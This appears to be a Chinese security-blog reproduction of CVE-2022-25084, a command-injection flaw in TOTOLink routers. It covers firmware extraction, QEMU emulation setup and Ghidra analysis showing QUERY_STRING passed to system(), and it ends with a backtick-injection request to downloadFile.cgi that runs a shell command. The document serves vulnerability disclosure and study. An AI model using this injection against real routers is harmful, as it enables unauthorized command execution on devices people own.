TOTOLink 多个设备 download.cgi 远程命令执行漏洞 CVE-2022-25084

admin 2022年4月3日11:38:27安全新闻评论91 views1404字阅读4分40秒阅读模式
TOTOLink 多个设备 download.cgi 远程命令执行漏洞 CVE-2022-25084
TOTOLink 多个设备 download.cgi 远程命令执行漏洞 CVE-2022-25084

漏洞描述

TOTOLink 多个设备 download.cgi文件存在远程命令执行漏洞,攻击者通过构造特殊的请求可以获取服务器权限

漏洞影响

TOTOLink 多个设备

漏洞复现

下载路由器固件

TOTOLink 多个设备 download.cgi 远程命令执行漏洞 CVE-2022-25084

使用binwalk分解固件

TOTOLink 多个设备 download.cgi 远程命令执行漏洞 CVE-2022-25084

查看分解出来的文件

TOTOLink 多个设备 download.cgi 远程命令执行漏洞 CVE-2022-25084
TOTOLink 多个设备 download.cgi 远程命令执行漏洞 CVE-2022-25084

使用qemu搭建路由器

#set network
sudo brctl addbr virbr2
sudo ifconfig virbr2 192.168.6.1/24 up
sudo tunctl -t tap2
sudo ifconfig tap2 192.168.6.11/24 up
sudo brctl addif virbr2 tap2

qemu-system-mipsel -M malta -kernel vmlinux-3.2.0-4-4kc-malta -hda debian_wheezy_mipsel_standard.qcow2 -append "root=/dev/sda1" -netdev tap,id=tapnet,ifname=tap2,script=no -device rtl8139,netdev=tapnet -nographic

创建后在qemu里执行命令启动路由器

ifconfig eth0 192.168.6.11 up 
scp -r squashfs-root/ [email protected]192.168.6.11:/root/     
chroot ./squashfs-root/ /bin/sh
touch /var/run/lighttpd.pid
./bin/lighttpd -f ./lighttp/lighttpd.conf -m ./lighttp/lib

注意 lighttpd.conf 文件需要修改 server.pid-file 参数

TOTOLink 多个设备 download.cgi 远程命令执行漏洞 CVE-2022-25084

启动后访问路由器页面

TOTOLink 多个设备 download.cgi 远程命令执行漏洞 CVE-2022-25084

我们找到需要分析的文件目录 squashfs-root/web_cste/cgi-bin

TOTOLink 多个设备 download.cgi 远程命令执行漏洞 CVE-2022-25084

使用Ghidra分析 cgi文件 downloadFile.cgi

TOTOLink 多个设备 download.cgi 远程命令执行漏洞 CVE-2022-25084

我们注意到其中的system执行命令

pcVar1 = getenv("QUERY_STRING");
memset(acStack1424,0,0x200);
memset(acStack912,0,0x200);
sprintf(acStack1424,"echo QUERY_STRING:%s >/tmp/download",pcVar1);
system(acStack1424);

其中 getenv 从请求Url中获取参数,传参给pcVar1,再通过下面的sprintf 赋值给 acStack1424 使用 system函数 进行命令执行

TOTOLink 多个设备 download.cgi 远程命令执行漏洞 CVE-2022-25084

我们构造请求包控制 QUERY_STRING 参数来进行恶意命令执行

/cgi-bin/downloadFlile.cgi?payload=`ls>../cmd.txt`
TOTOLink 多个设备 download.cgi 远程命令执行漏洞 CVE-2022-25084
TOTOLink 多个设备 download.cgi 远程命令执行漏洞 CVE-2022-25084

关注公众号

下面就是文库的公众号啦,更新的文章都会在第一时间推送在交流群和公众号
想要加入交流群的师傅公众号点击交流群找WgpsecBot机器人拉你啦~

支持作者

TOTOLink 多个设备 download.cgi 远程命令执行漏洞 CVE-2022-25084

关于文库

在线文库: http://wiki.peiqi.tech
Github: https://github.com/PeiQi0/PeiQi-WIKI-Book 
TOTOLink 多个设备 download.cgi 远程命令执行漏洞 CVE-2022-25084

文库动态

TOTOLink 多个设备 download.cgi 远程命令执行漏洞 CVE-2022-25084


原文始发于微信公众号(PeiQi文库):TOTOLink 多个设备 download.cgi 远程命令执行漏洞 CVE-2022-25084

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月3日11:38:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  TOTOLink 多个设备 download.cgi 远程命令执行漏洞 CVE-2022-25084 http://cn-sec.com/archives/866312.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: